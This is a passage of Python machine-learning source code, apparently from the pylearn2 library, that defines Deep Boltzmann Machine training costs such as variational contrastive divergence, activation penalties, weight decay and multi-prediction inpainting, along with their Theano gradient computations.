# we'll need to make the expected energy clamp Y in the positive
# phase
assert isinstance(model.hidden_layers[-1], dbm.Softmax)
else:
X = data
Y = None
q = model.mf(X, Y)
"""
Use the non-negativity of the KL divergence to construct a lower bound
on the log likelihood. We can drop all terms that are constant with
respect to the model parameters:
log P(v) = L(v, q) + KL(q || P(h|v))
L(v, q) = log P(v) - KL(q || P(h|v))
L(v, q) = log P(v) - sum_h q(h) log q(h) + q(h) log P(h | v)
L(v, q) = log P(v) + sum_h q(h) log P(h | v) + const
L(v, q) = log P(v) + sum_h q(h) log P(h, v) - sum_h q(h) log P(v) + C
L(v, q) = sum_h q(h) log P(h, v) + C
L(v, q) = sum_h q(h) - E(h, v) - log Z + C
so the cost we want to minimize is
expected_energy + log Z + C
Note: for the RBM, this bound is exact, since the KL divergence
goes to 0.
"""
variational_params = flatten(q)
# The gradients of the expected energy under q are easy, we can just
# do that in theano
expected_energy_q = model.expected_energy(X, q).mean()
params = list(model.get_params())
grads = T.grad(expected_energy_q, params,
consider_constant=variational_params,
disconnected_inputs='ignore')
gradients = OrderedDict(safe_zip(params, grads))
"""
d/d theta log Z = (d/d theta Z) / Z
= (d/d theta sum_h sum_v exp(-E(v,h)) ) / Z
= (sum_h sum_v - exp(-E(v,h)) d/d theta E(v,h) ) / Z
= - sum_h sum_v P(v,h) d/d theta E(v,h)
"""
layer_to_chains = model.make_layer_to_state(self.num_chains)
def recurse_check(l):
if isinstance(l, (list, tuple)):
for elem in l:
recurse_check(elem)
else:
assert l.get_value().shape[0] == self.num_chains
recurse_check(layer_to_chains.values())
model.layer_to_chains = layer_to_chains
# Note that we replace layer_to_chains with a dict mapping to the new
# state of the chains
gsu = model.get_sampling_updates
updates, layer_to_chains = gsu(layer_to_chains, self.theano_rng,
num_steps=self.num_gibbs_steps,
return_layer_to_updated=True)
# Variance reduction is hardcoded for this exact model
assert isinstance(model.visible_layer, dbm.BinaryVector)
assert isinstance(model.hidden_layers[0], dbm.BinaryVectorMaxPool)
assert model.hidden_layers[0].pool_size == 1
assert isinstance(model.hidden_layers[1], dbm.BinaryVectorMaxPool)
assert model.hidden_layers[1].pool_size == 1
assert isinstance(model.hidden_layers[2], dbm.Softmax)
assert len(model.hidden_layers) == 3
V_samples = layer_to_chains[model.visible_layer]
H1_samples, H2_samples, Y_samples = [layer_to_chains[layer] for layer
in model.hidden_layers]
sa = model.hidden_layers[0].downward_state(H1_samples)
V_mf = model.visible_layer.inpaint_update(layer_above=
model.hidden_layers[0],
state_above=sa)
f = model.hidden_layers[0].mf_update
sb = model.visible_layer.upward_state(V_samples)
sa = model.hidden_layers[1].downward_state(H2_samples)
H1_mf = f(state_below=sb, state_above=sa,
layer_above=model.hidden_layers[1])
f = model.hidden_layers[1].mf_update
sb = model.hidden_layers[0].upward_state(H1_samples)
sa = model.hidden_layers[2].downward_state(Y_samples)
H2_mf = f(state_below=sb,
state_above=sa,
layer_above=model.hidden_layers[2])
sb = model.hidden_layers[1].upward_state(H2_samples)
Y_mf = model.hidden_layers[2].mf_update(state_below=sb)
e1 = model.energy(V_samples, [H1_mf, H2_samples, Y_mf]).mean()
e2 = model.energy(V_mf, [H1_samples, H2_mf, Y_samples]).mean()
expected_energy_p = 0.5 * (e1 + e2)
constants = flatten([V_samples, V_mf, H1_samples, H1_mf, H2_samples,
H2_mf, Y_mf, Y_samples])
neg_phase_grads = OrderedDict(safe_zip(params, T.grad(
-expected_energy_p, params, consider_constant=constants)))
for param in list(gradients.keys()):
gradients[param] = neg_phase_grads[param] + gradients[param]
return gradients, updates
class VariationalCD(DefaultDataSpecsMixin, BaseCD):
"""
An intractable cost representing the negative log likelihood of a DBM.
The gradient of this bound is computed using a markov chain initialized
with the training example.
Source: Hinton, G. Training Products of Experts by Minimizing
Contrastive Divergence
Parameters
----------
num_chains: int
Ignored, I guess?
num_gibbs_steps : int
The number of Gibbs steps to use in the negative phase. (i.e., if
you want to use CD-k or PCD-k, this is "k").
supervised : bool
If True, requests class labels and models the joint distrbution over
features and labels.
toronto_neg : bool
If True, use a bit of mean field in the negative phase.
Ruslan Salakhutdinov's matlab code does this.
theano_rng : MRG_RandomStreams, optional
If specified, uses this object to generate all random numbers.
Otherwise, makes its own random number generator.
"""
def _get_positive_phase(self, model, X, Y=None):
"""
.. todo::
WRITEME
"""
return self._get_variational_pos(model, X, Y), OrderedDict()
def _get_negative_phase(self, model, X, Y=None):
"""
.. todo::
WRITEME
d/d theta log Z = (d/d theta Z) / Z
= (d/d theta sum_h sum_v exp(-E(v,h)) ) / Z
= (sum_h sum_v - exp(-E(v,h)) d/d theta E(v,h) ) / Z
= - sum_h sum_v P(v,h) d/d theta E(v,h)
"""
layer_to_clamp = OrderedDict([(model.visible_layer, True)])
layer_to_chains = model.make_layer_to_symbolic_state(self.num_chains,
self.theano_rng)
# The examples are used to initialize the visible layer's chains
layer_to_chains[model.visible_layer] = X
# If we use supervised training, we need to make sure the targets are
# also clamped.
if self.supervised:
assert Y is not None
# note: if the Y layer changes to something without linear energy,
# we'll need to make the expected energy clamp Y in the positive
# phase
assert isinstance(model.hidden_layers[-1], Softmax)
layer_to_clamp[model.hidden_layers[-1]] = True
layer_to_chains[model.hidden_layers[-1]] = Y
model.layer_to_chains = layer_to_chains
# Note that we replace layer_to_chains with a dict mapping to the new
# state of the chains
# We first initialize the chain by clamping the visible layer and the
# target layer (if it exists)
layer_to_chains = model.sampling_procedure.sample(
layer_to_chains,
self.theano_rng,
layer_to_clamp=layer_to_clamp,
num_steps=1
)
# We then do the required mcmc steps
layer_to_chains = model.sampling_procedure.sample(
layer_to_chains,
self.theano_rng,
num_steps=self.num_gibbs_steps
)
if self.toronto_neg:
neg_phase_grads = self._get_toronto_neg(model, layer_to_chains)
else:
neg_phase_grads = self._get_standard_neg(model, layer_to_chains)
return neg_phase_grads, OrderedDict()
class MF_L1_ActCost(DefaultDataSpecsMixin, Cost):
"""
L1 activation cost on the mean field parameters.
Adds a cost of:
coeff * max( abs(mean_activation - target) - eps, 0)
averaged over units
for each layer.
Parameters
----------
targets : list
A list, one element per layer, specifying the activation each
layer should be encouraged to have.
Each element may also be a list depending on the structure of
the layer.
See each layer's get_l1_act_cost for a specification of what
the state should be.
coeffs: list
A list, one element per layer, specifying the coefficient
to put on the L1 activation cost for each layer.
supervised: bool
If true, runs mean field on both X and Y, penalizing
the layers in between only
"""
def __init__(self, targets, coeffs, eps, supervised):
self.__dict__.update(locals())
del self.self
@wraps(Cost.expr)
def expr(self, model, data, ** kwargs):
if self.supervised:
X, Y = data
H_hat = model.mf(X, Y=Y)
else:
X = data
H_hat = model.mf(X)
hidden_layers = model.hidden_layers
if self.supervised:
hidden_layers = hidden_layers[:-1]
H_hat = H_hat[:-1]
layer_costs = []
for layer, mf_state, targets, coeffs, eps in \
safe_zip(hidden_layers, H_hat, self.targets, self.coeffs,
self.eps):
cost = None
try:
cost = layer.get_l1_act_cost(mf_state, targets, coeffs, eps)
except NotImplementedError:
assert isinstance(coeffs, float) and coeffs == 0.
assert cost is None # if this gets triggered, there might
# have been a bug, where costs from lower layers got
# applied to higher layers that don't implement the cost
cost = None
if cost is not None:
layer_costs.append(cost)
assert T.scalar() != 0. # make sure theano semantics do what I want
layer_costs = [cost_ for cost_ in layer_costs if cost_ != 0.]
if len(layer_costs) == 0:
return T.as_tensor_variable(0.)
else:
total_cost = reduce(operator.add, layer_costs)
total_cost.name = 'MF_L1_ActCost'
assert total_cost.ndim == 0
return total_cost
class MF_L2_ActCost(DefaultDataSpecsMixin, Cost):
"""
An L2 penalty on the amount that the hidden unit mean field parameters
deviate from desired target values.
Parameters
----------
targets : list
A list, one element per layer, specifying the activation each
layer should be encouraged to have.
Each element may also be a list depending on the structure of
the layer.
See each layer's get_l2_act_cost for a specification of what
the state should be.
coeffs: list
A list, one element per layer, specifying the coefficient
to put on the L2 activation cost for each layer.
supervised: bool
If true, runs mean field on both X and Y, penalizing
the layers in between only
"""
def __init__(self, targets, coeffs, supervised=False):
targets = fix(targets)
coeffs = fix(coeffs)
self.__dict__.update(locals())
del self.self
def expr(self, model, data, return_locals=False, **kwargs):
"""
Returns the expression for the Cost.
Parameters
----------
model : Model
data : Batch in get_data_specs format
return_locals : bool
If returns locals is True, returns (objective, locals())
Note that this means adding / removing / changing the value of
local variables is an interface change.
In particular, TorontoSparsity depends on "terms" and "H_hat"
kwargs : optional keyword arguments for FixedVarDescr
"""
self.get_data_specs(model)[0].validate(data)
if self.supervised:
(X, Y) = data
else:
X = data
Y = None
H_hat = model.mf(X, Y=Y)
terms = []
hidden_layers = model.hidden_layers
# if self.supervised:
# hidden_layers = hidden_layers[:-1]
for layer, mf_state, targets, coeffs in \
safe_zip(hidden_layers, H_hat, self.targets, self.coeffs):
try:
cost = layer.get_l2_act_cost(mf_state, targets, coeffs)
except NotImplementedError:
if isinstance(coeffs, float) and coeffs == 0.:
cost = 0.
else:
raise
terms.append(cost)
objective = sum(terms)
if return_locals:
return objective, locals()
return objective
def fix(l):
"""
Turns (lists of) strings into (lists of) floats.
Parameters
----------
l : object
Returns
-------
l : object
If `l` is anything but a string, the return is the
same as the input, but it may have been modified in place.
If `l` is a string, the return value is `l` converted to a float.
If `l` is a list, this function explores all nested lists inside
`l` and turns all string members into floats.
"""
if isinstance(l, list):
return [fix(elem) for elem in l]
if isinstance(l, str):
return float(l)
return l
class TorontoSparsity(Cost):
"""
A somewhat strange sparsity penalty borrowed from Ruslan
Salakhutdinov's MATLAB MNIST DBM demo.
It's an activation penalty using mean squared error on
the activations, except to backprop from the activations
to the parameters we pretend the model was partially linear.
TODO: add link to Ruslan Salakhutdinov's paper that this is based on
Parameters
----------
targets : list
A list of ideal activation values for each layer
coeffs : list
A list of coefficients for the penalty on each layer
supervised: bool
If True, the last layer of the model is the layer
representing the targets, and this class should ignore
it.
"""
def __init__(self, targets, coeffs, supervised=False):
self.__dict__.update(locals())
del self.self
self.base_cost = MF_L2_ActCost(targets=targets,
coeffs=coeffs, supervised=supervised)
@wraps(Cost.expr)
def expr(self, model, data, return_locals=False, **kwargs):
self.get_data_specs(model)[0].validate(data)
return self.base_cost.expr(model, data, return_locals=return_locals,
**kwargs)
@wraps(Cost.get_gradients)
def get_gradients(self, model, data, **kwargs):
self.get_data_specs(model)[0].validate(data)
obj, scratch = self.base_cost.expr(model, data, return_locals=True,
**kwargs)
if self.supervised:
assert isinstance(data, (list, tuple))
assert len(data) == 2
(X, Y) = data
else:
X = data
H_hat = scratch['H_hat']
terms = scratch['terms']
hidden_layers = scratch['hidden_layers']
grads = OrderedDict()
assert len(H_hat) == len(terms)
assert len(terms) == len(hidden_layers)
num_layers = len(hidden_layers)
for i in xrange(num_layers):
state = H_hat[i]
layer = model.hidden_layers[i]
term = terms[i]
if term == 0.:
continue
else:
logger.info('term is {0}'.format(term))
if i == 0:
state_below = X
layer_below = model.visible_layer
else:
layer_below = model.hidden_layers[i - 1]
state_below = H_hat[i - 1]
state_below = layer_below.upward_state(state_below)
components = flatten(state)
real_grads = T.grad(term, components)
fake_state = layer.linear_feed_forward_approximation(state_below)
fake_components = flatten(fake_state)
real_grads = OrderedDict(safe_zip(fake_components, real_grads))
params = list(layer.get_params())
fake_grads = pylearn2.utils.grad(
cost=None,
consider_constant=flatten(state_below),
wrt=params,
known_grads=real_grads
)
for param, grad in safe_zip(params, fake_grads):
if param in grads:
grads[param] = grads[param] + grad
else:
grads[param] = grad
return grads, OrderedDict()
@wraps(Cost.get_data_specs)
def get_data_specs(self, model):
return self.base_cost.get_data_specs(model)
class WeightDecay(NullDataSpecsMixin, Cost):
"""
A Cost that applies the following cost function:
coeff * sum(sqr(weights))
for each set of weights.
Parameters
----------
coeffs : list
One element per layer, specifying the coefficient
to put on the L1 activation cost for each layer.
Each element may in turn be a list, ie, for CompositeLayers.
"""
def __init__(self, coeffs):
self.__dict__.update(locals())
del self.self
@wraps(Cost.expr)
def expr(self, model, data, ** kwargs):
self.get_data_specs(model)[0].validate(data)
layer_costs = [layer.get_weight_decay(coeff)
for layer, coeff in safe_izip(model.hidden_layers,
self.coeffs)]
assert T.scalar() != 0. # make sure theano semantics do what I want
layer_costs = [cost for cost in layer_costs if cost != 0.]
if len(layer_costs) == 0:
rval = T.as_tensor_variable(0.)
rval.name = '0_weight_decay'
return rval
else:
total_cost = reduce(operator.add, layer_costs)
total_cost.name = 'DBM_WeightDecay'
assert total_cost.ndim == 0
total_cost.name = 'weight_decay'
return total_cost
class MultiPrediction(DefaultDataSpecsMixin, Cost):
"""
If you use this class in your research work, please cite:
Multi-prediction deep Boltzmann machines. Ian J. Goodfellow, Mehdi Mirza,
Aaron Courville, and Yoshua Bengio. NIPS 2013.
Parameters
----------
monitor_multi_inference : bool
If True, produce extra monitoring channels tracking the performance
of the multi inference trick during learning.
mask_gen : MaskGen
The object used to generate the masking patterns that determine which
units are inputs and which units are targets each time we load another
minibatch of data.
noise : bool
Passed through to the DBM's `do_inpainting` method
both_directions : bool
If True, construct two versions of the log pseudolikelihood and average
them together to make the total cost. The second log pseudolikelihood
uses the inputs from the first version as targets and vice versa.
l1_act_coeffs : list
List of L1 activation coefficients. This is different from using
MF_L1ActCost because it is applied directly to the activations used
during multi-prediction training, rather than to mean field inference
on fully observed input vectors.
l1_act_targets : list
List of L1 activation targets.
l1_act_eps : list
List of epsilon values for epsilon insensitive L1 activity
regularization.
range_rewards : list
List of coefficients on a negative "cost" that rewards units whose
range is greater.
std_rewards: list
Same but for standard deviation rather than range
robustness : bool
If True, add a penalty encouraging the representation to
be similar for two different masks.
supervised : bool
If True, also model the class label.
niter : int, optional
Number of iterations to run mean field inference
block_grad : int, optional
Don't backprop through the first n iterations
vis_presynaptic_cost: WRITEME
hid_presynaptic_cost: WRITEME
reweighted_act_coeffs: WRITEME
reweighted_act_targets: WRITEME
toronto_act_targets: list
List of targets for Toronto-style activation regularization
of multi-prediction activations
toronto_act_coeffs : list
List of coefficients for Toronto-style activation regularization
monitor_each_step : bool
If True, monitor every step of inference, rather than just the outcome
use_sum : WRITEME
"""
def __init__(self,
monitor_multi_inference=False,
mask_gen=None,
noise=False,
both_directions=False,
l1_act_coeffs=None,
l1_act_targets=None,
l1_act_eps=None,
range_rewards=None,
stdev_rewards=None,
robustness=None,
supervised=False,
niter=None,
block_grad=None,
vis_presynaptic_cost=None,
hid_presynaptic_cost=None,
reweighted_act_coeffs=None,
reweighted_act_targets=None,
toronto_act_targets=None,
toronto_act_coeffs=None,
monitor_each_step=False,
use_sum=False):
self.__dict__.update(locals())
del self.self
@wraps(Cost.get_monitoring_channels)
def get_monitoring_channels(self, model, data, drop_mask=None,
drop_mask_Y=None, **kwargs):
if self.supervised:
X, Y = data
else:
X = data
Y = None
if self.supervised:
assert Y is not None
rval = OrderedDict()
# TODO: shouldn't self() handle this?
if drop_mask is not None and drop_mask.ndim < X.ndim:
if self.mask_gen is not None:
assert self.mask_gen.sync_channels
if X.ndim != 4:
raise NotImplementedError()
drop_mask = drop_mask.dimshuffle(0, 1, 2, 'x')
if Y is None:
data = X
else:
data = (X, Y)
scratch = self.expr(model, data, drop_mask=drop_mask,
drop_mask_Y=drop_mask_Y,
return_locals=True)
history = scratch['history']
new_history = scratch['new_history']
new_drop_mask = scratch['new_drop_mask']
new_drop_mask_Y = None
drop_mask = scratch['drop_mask']
if self.supervised:
drop_mask_Y = scratch['drop_mask_Y']
new_drop_mask_Y = scratch['new_drop_mask_Y']
ii = 0
for name in ['inpaint_cost', 'l1_act_cost', 'toronto_act_cost',
'reweighted_act_cost']:
var = scratch[name]
if var is not None:
rval['total_inpaint_cost_term_' + str(ii) + '_' + name] = var
ii = ii + 1
if self.monitor_each_step:
for ii, packed in enumerate(safe_izip(history, new_history)):
state, new_state = packed
c = self.cost_from_states(state,
new_state, model, X, Y, drop_mask,
drop_mask_Y, new_drop_mask,
new_drop_mask_Y)
rval['all_inpaint_costs_after_' + str(ii)] = c
if ii > 0:
prev_state = history[ii - 1]
V_hat = state['V_hat']
prev_V_hat = prev_state['V_hat']
rval['max_pixel_diff[%d]' % ii] = abs(
V_hat - prev_V_hat).max()
final_state = history[-1]
# empirical beta code--should be moved to gaussian visible layer,
# should support topo data
# V_hat = final_state['V_hat']
# err = X - V_hat
# masked_err = err * drop_mask
# sum_sqr_err = T.sqr(masked_err).sum(axis=0)
# recons_count = T.cast(drop_mask.sum(axis=0), 'float32')
# empirical_beta = recons_count / sum_sqr_err
# assert empirical_beta.ndim == 1
# rval['empirical_beta_min'] = empirical_beta.min()
# rval['empirical_beta_mean'] = empirical_beta.mean()
# rval['empirical_beta_max'] = empirical_beta.max()
layers = model.get_all_layers()
states = [final_state['V_hat']] + final_state['H_hat']
for layer, state in safe_izip(layers, states):
d = layer.get_monitoring_channels_from_state(state)
for key in d:
mod_key = 'final_inpaint_' + layer.layer_name + '_' + key
assert mod_key not in rval
rval[mod_key] = d[key]
if self.supervised:
inpaint_Y_hat = history[-1]['H_hat'][-1]
err = T.neq(T.argmax(inpaint_Y_hat, axis=1), T.argmax(Y, axis=1))
assert err.ndim == 1
assert drop_mask_Y.ndim == 1
err = T.dot(err, drop_mask_Y) / drop_mask_Y.sum()
if err.dtype != inpaint_Y_hat.dtype:
err = T.cast(err, inpaint_Y_hat.dtype)
rval['inpaint_err'] = err
Y_hat = model.mf(X)[-1]
Y = T.argmax(Y, axis=1)
Y = T.cast(Y, Y_hat.dtype)
argmax = T.argmax(Y_hat, axis=1)
if argmax.dtype != Y_hat.dtype:
argmax = T.cast(argmax, Y_hat.dtype)
err = T.neq(Y, argmax).mean()
if err.dtype != Y_hat.dtype:
err = T.cast(err, Y_hat.dtype)
rval['err'] = err
if self.monitor_multi_inference:
Y_hat = model.inference_procedure.multi_infer(X)
argmax = T.argmax(Y_hat, axis=1)
if argmax.dtype != Y_hat.dtype:
argmax = T.cast(argmax, Y_hat.dtype)
err = T.neq(Y, argmax).mean()
if err.dtype != Y_hat.dtype:
err = T.cast(err, Y_hat.dtype)
rval['multi_err'] = err
return rval
@wraps(Cost.expr)
def expr(self, model, data, drop_mask=None, drop_mask_Y=None,
return_locals=False, include_toronto=True, ** kwargs):
if self.supervised:
X, Y = data
else:
X = data
Y = None
if not self.supervised:
assert drop_mask_Y is None
# ignore Y if some other cost is supervised and has made it get
# passed in (can this still happen after the (space, source)
# interface change?)
Y = None
if self.supervised:
assert Y is not None
if drop_mask is not None:
assert drop_mask_Y is not None
if not hasattr(model, 'cost'):
model.cost = self
if not hasattr(model, 'mask_gen'):
model.mask_gen = self.mask_gen
dbm = model
X_space = model.get_input_space()
if drop_mask is None:
if self.supervised:
drop_mask, drop_mask_Y = self.mask_gen(X, Y, X_space=X_space)
else:
drop_mask = self.mask_gen(X, X_space=X_space)
if drop_mask_Y is not None:
assert drop_mask_Y.ndim == 1
if drop_mask.ndim < X.ndim:
if self.mask_gen is not None:
assert self.mask_gen.sync_channels
if X.ndim != 4:
raise NotImplementedError()
drop_mask = drop_mask.dimshuffle(0, 1, 2, 'x')
if not hasattr(self, 'noise'):
self.noise = False
history = dbm.do_inpainting(X, Y=Y, drop_mask=drop_mask,
drop_mask_Y=drop_mask_Y,
return_history=True,
noise=self.noise,
niter=self.niter,
block_grad=self.block_grad)
final_state = history[-1]
new_drop_mask = None
new_drop_mask_Y = None
new_history = [None for state in history]
if not hasattr(self, 'both_directions'):
self.both_directions = False
if self.both_directions:
new_drop_mask = 1. - drop_mask
if self.supervised:
new_drop_mask_Y = 1. - drop_mask_Y
di = dbm.di_inpainting
new_history = di(X, Y=Y,
drop_mask=new_drop_mask,
drop_mask_Y=new_drop_mask_Y, return_history=True,
noise=self.noise,
niter=self.niter, block_grad=self.block_grad)
new_final_state = new_history[-1]
cfs = self.cost_from_states
out = cfs(final_state, new_final_state, dbm, X, Y, drop_mask,
drop_mask_Y, new_drop_mask, new_drop_mask_Y,
return_locals=True)
total_cost, sublocals = out
l1_act_cost = sublocals['l1_act_cost']
inpaint_cost = sublocals['inpaint_cost']
reweighted_act_cost = sublocals['reweighted_act_cost']
if not hasattr(self, 'robustness'):
self.robustness = None
if self.robustness is not None:
inpainting_H_hat = history[-1]['H_hat']
mf_H_hat = dbm.mf(X, Y=Y)
if self.supervised:
inpainting_H_hat = inpainting_H_hat[:-1]
mf_H_hat = mf_H_hat[:-1]
for ihh, mhh in safe_izip(flatten(inpainting_H_hat),
flatten(mf_H_hat)):
total_cost += self.robustness * T.sqr(mhh - ihh).sum()
if not hasattr(self, 'toronto_act_targets'):
self.toronto_act_targets = None
toronto_act_cost = None
if self.toronto_act_targets is not None and include_toronto:
toronto_act_cost = 0.
H_hat = history[-1]['H_hat']
for s, c, t in zip(H_hat, self.toronto_act_coeffs,
self.toronto_act_targets):
if c == 0.:
continue
s, _ = s
m = s.mean(axis=0)
toronto_act_cost += c * T.sqr(m - t).mean()
total_cost += toronto_act_cost
if return_locals:
return locals()
total_cost.name = 'total_inpaint_cost'
return total_cost
def get_fixed_var_descr(self, model, data):
"""
Returns the FixedVarDescr object responsible for making sure the
masks that determine which units are inputs and outputs are generated
each time a minibatch is loaded.
Parameters
----------
model : DBM
data : Batch in get_data_specs format
"""
X, Y = data
assert Y is not None
batch_size = model.batch_size
drop_mask_X = sharedX(
model.get_input_space().get_origin_batch(batch_size))
drop_mask_X.name = 'drop_mask'
X_space = model.get_input_space()
updates = OrderedDict()
rval = FixedVarDescr()
inputs = [X, Y]
if not self.supervised:
update_X = self.mask_gen(X, X_space=X_space)
else:
drop_mask_Y = sharedX(np.ones(batch_size,))
drop_mask_Y.name = 'drop_mask_Y'
update_X, update_Y = self.mask_gen(X, Y, X_space)
updates[drop_mask_Y] = update_Y
rval.fixed_vars['drop_mask_Y'] = drop_mask_Y
if self.mask_gen.sync_channels:
n = update_X.ndim
assert n == drop_mask_X.ndim - 1
update_X.name = 'raw_update_X'
zeros_like_X = T.zeros_like(X)
zeros_like_X.name = 'zeros_like_X'
update_X = zeros_like_X + update_X.dimshuffle(0, 1, 2, 'x')
update_X.name = 'update_X'
updates[drop_mask_X] = update_X
rval.fixed_vars['drop_mask'] = drop_mask_X
if hasattr(model.inference_procedure, 'V_dropout'):
include_prob = model.inference_procedure.include_prob
include_prob_V = model.inference_procedure.include_prob_V
include_prob_Y = model.inference_procedure.include_prob_Y
theano_rng = make_theano_rng(None, 2012 + 10 + 20,
which_method="binomial")
for elem in flatten([model.inference_procedure.V_dropout]):
updates[elem] = theano_rng.binomial(p=include_prob_V,
size=elem.shape,
dtype=elem.dtype,
n=1) / include_prob_V
if "Softmax" in str(type(model.hidden_layers[-1])):
hid = model.inference_procedure.H_dropout[:-1]
y = model.inference_procedure.H_dropout[-1]
updates[y] = theano_rng.binomial(p=include_prob_Y,
size=y.shape, dtype=y.dtype,
n=1) / include_prob_Y
else:
hid = model.inference_procedure.H_dropout
for elem in flatten(hid):
updates[elem] = theano_rng.binomial(p=include_prob,
size=elem.shape,
dtype=elem.dtype,
n=1) / include_prob
rval.on_load_batch = [utils.function(inputs, updates=updates)]
return rval
@wraps(Cost.get_gradients)
def get_gradients(self, model, X, Y=None, **kwargs):
if Y is None:
data = X
else:
data = (X, Y)
scratch = self.expr(model, data, include_toronto=False,
return_locals=True, **kwargs)
total_cost = scratch['total_cost']
params = list(model.get_params())
grads = dict(safe_zip(params, T.grad(total_cost, params,
disconnected_inputs='ignore')))
if self.toronto_act_targets is not None:
H_hat = scratch['history'][-1]['H_hat']
for i, packed in enumerate(safe_zip(H_hat,
self.toronto_act_coeffs,
self.toronto_act_targets)):
s, c, t = packed
if c == 0.:
continue
s, _ = s
m = s.mean(axis=0)
m_cost = c * T.sqr(m - t).mean()
real_grads = T.grad(m_cost, s)
if i == 0:
below = X
else:
below = H_hat[i - 1][0]
W, = model.hidden_layers[i].transformer.get_params()
assert W in grads
b = model.hidden_layers[i].b
ancestor = T.scalar()
hack_W = W + ancestor
hack_b = b + ancestor
fake_s = T.dot(below, hack_W) + hack_b
if fake_s.ndim != real_grads.ndim:
logger.error(fake_s.ndim)
logger.error(real_grads.ndim)
assert False
sources = [(fake_s, real_grads)]
fake_grads = T.grad(cost=None, known_grads=dict(sources),
wrt=[below, ancestor, hack_W, hack_b])
grads[W] = grads[W] + fake_grads[2]
grads[b] = grads[b] + fake_grads[3]
return grads, OrderedDict()
def get_inpaint_cost(self, dbm, X, V_hat_unmasked, drop_mask, state,
Y, drop_mask_Y):
"""
Returns the generalized pseudolikelihood giving raw data, a mask,
and the output of inference.
Parameters
----------
dbm : DBM
X : a batch of inputs
V_hat_unmasked : A batch of reconstructions of X
drop_mask : A batch of mask values
state : Hidden states of the DBM
Y : a batch of labels
drop_mask_Y : A batch of Y mask values
"""
rval = dbm.visible_layer.recons_cost(X, V_hat_unmasked, drop_mask,
use_sum=self.use_sum)
if self.supervised:
# pyflakes is too dumb to see that both branches define `scale`
scale = None
if self.use_sum:
scale = 1.
else:
scale = 1. / float(dbm.get_input_space().get_total_dimension())
Y_hat_unmasked = state['Y_hat_unmasked']
rc = dbm.hidden_layers[-1].recons_cost
rval = rval + rc(Y, Y_hat_unmasked, drop_mask_Y, scale)
return rval
def cost_from_states(self, state, new_state, dbm, X, Y, drop_mask,
drop_mask_Y, new_drop_mask, new_drop_mask_Y,
return_locals=False):
"""
Returns the total cost, given the states produced by inference.
This includes activity regularization costs, not just generalized
pseudolikelihood costs.
Parameters
----------
state : The state of the model after inference.
new_state : OrderedDict
The state of the model after inference with a different mask.
dbm : DBM.
X : A batch of input pixels.
Y : A batch of output labels.
drop_mask : A batch of mask values determining which pixels are inputs.
drop_mask_Y : Theano matrix
A batch of mask values determining which labels are inputs.
new_drop_mask : The second mask.
new_drop_mask_Y : The second label mask.
return_locals : bool
If True, return all local variables
Returns
-------
cost : Theano expression for the cost
locals : Optional
If return_locals is True, returns the dictionary of all local
variables. Note that this means all implementation changes are
now API changes.
"""
if not self.supervised:
assert drop_mask_Y is None
assert new_drop_mask_Y is None
if self.supervised:
assert drop_mask_Y is not None
if self.both_directions:
assert new_drop_mask_Y is not None
assert Y is not None
V_hat_unmasked = state['V_hat_unmasked']
assert V_hat_unmasked.ndim == X.ndim
if not hasattr(self, 'use_sum'):
self.use_sum = False
inpaint_cost = self.get_inpaint_cost(dbm, X, V_hat_unmasked, drop_mask,
state, Y, drop_mask_Y)
if not hasattr(self, 'both_directions'):
self.both_directions = False
assert self.both_directions == (new_state is not None)
if new_state is not None:
new_V_hat_unmasked = new_state['V_hat_unmasked']
rc = dbm.visible_layer.recons_cost
new_inpaint_cost = rc(X, new_V_hat_unmasked, new_drop_mask)
if self.supervised:
new_Y_hat_unmasked = new_state['Y_hat_unmasked']
scale = None
raise NotImplementedError("This branch appears to be broken,"
"needs to define scale.")
new_inpaint_cost = new_inpaint_cost + \
dbm.hidden_layers[-1].recons_cost(Y,
new_Y_hat_unmasked,
new_drop_mask_Y, scale)
# end if include_Y
inpaint_cost = 0.5 * inpaint_cost + 0.5 * new_inpaint_cost
# end if both directions
total_cost = inpaint_cost
if not hasattr(self, 'range_rewards'):
self.range_rewards = None
if self.range_rewards is not None:
for layer, mf_state, coeffs in safe_izip(
dbm.hidden_layers,
state['H_hat'],
self.range_rewards):
try:
layer_cost = layer.get_range_rewards(mf_state, coeffs)
except NotImplementedError:
if coeffs == 0.:
layer_cost = 0.
else:
raise
if layer_cost != 0.:
total_cost += layer_cost
if not hasattr(self, 'stdev_rewards'):
self.stdev_rewards = None
if self.stdev_rewards is not None:
assert False # not monitored yet
for layer, mf_state, coeffs in safe_izip(
dbm.hidden_layers,
state['H_hat'],
self.stdev_rewards):
try:
layer_cost = layer.get_stdev_rewards(mf_state, coeffs)
except NotImplementedError:
if coeffs == 0.:
layer_cost = 0.
else:
raise
if layer_cost != 0.:
total_cost += layer_cost
l1_act_cost = None
if self.l1_act_targets is not None:
l1_act_cost = 0.
if self.l1_act_eps is None:
self.l1_act_eps = [None] * len(self.l1_act_targets)
for layer, mf_state, targets, coeffs, eps in \
safe_izip(dbm.hidden_layers, state['H_hat'],
self.l1_act_targets, self.l1_act_coeffs,
self.l1_act_eps):
assert not isinstance(targets, str)
try:
layer_cost = layer.get_l1_act_cost(mf_state, targets,
coeffs, eps)
except NotImplementedError:
if coeffs == 0.:
layer_cost = 0.
else:
raise
if layer_cost != 0.:
l1_act_cost += layer_cost
# end for substates
# end for layers
total_cost += l1_act_cost
# end if act penalty
if not hasattr(self, 'hid_presynaptic_cost'):
self.hid_presynaptic_cost = None
if self.hid_presynaptic_cost is not None:
assert False # not monitored yet
for c, s, in safe_izip(self.hid_presynaptic_cost, state['H_hat']):
if c == 0.:
continue
s = s[1]
assert hasattr(s, 'owner')
owner = s.owner
assert owner is not None
op = owner.op
if not hasattr(op, 'scalar_op'):
raise ValueError("Expected V_hat_unmasked to be generated"
"by an Elemwise op, got " + str(op)
+ " of type " + str(type(op)))
assert isinstance(op.scalar_op, T.nnet.sigm.ScalarSigmoid)
z, = owner.inputs
total_cost += c * T.sqr(z).mean()
if not hasattr(self, 'reweighted_act_targets'):
self.reweighted_act_targets = None
reweighted_act_cost = None
if self.reweighted_act_targets is not None:
reweighted_act_cost = 0.
warnings.warn("reweighted_act_cost is hardcoded for sigmoid "
"layers and doesn't check that this is what we get.")
for c, t, s in safe_izip(self.reweighted_act_coeffs,
self.reweighted_act_targets,
state['H_hat']):
if c == 0:
continue
s, _ = s
m = s.mean(axis=0)
d = T.sqr(m - t)
weight = 1. / (1e-7 + s * (1 - s))
reweighted_act_cost += c * (weight * d).mean()
total_cost += reweighted_act_cost
total_cost.name = 'total_cost(V_hat_unmasked = %s)' % \
V_hat_unmasked.name
if return_locals:
return total_cost, locals()
return total_cost
default_seed = 20120712
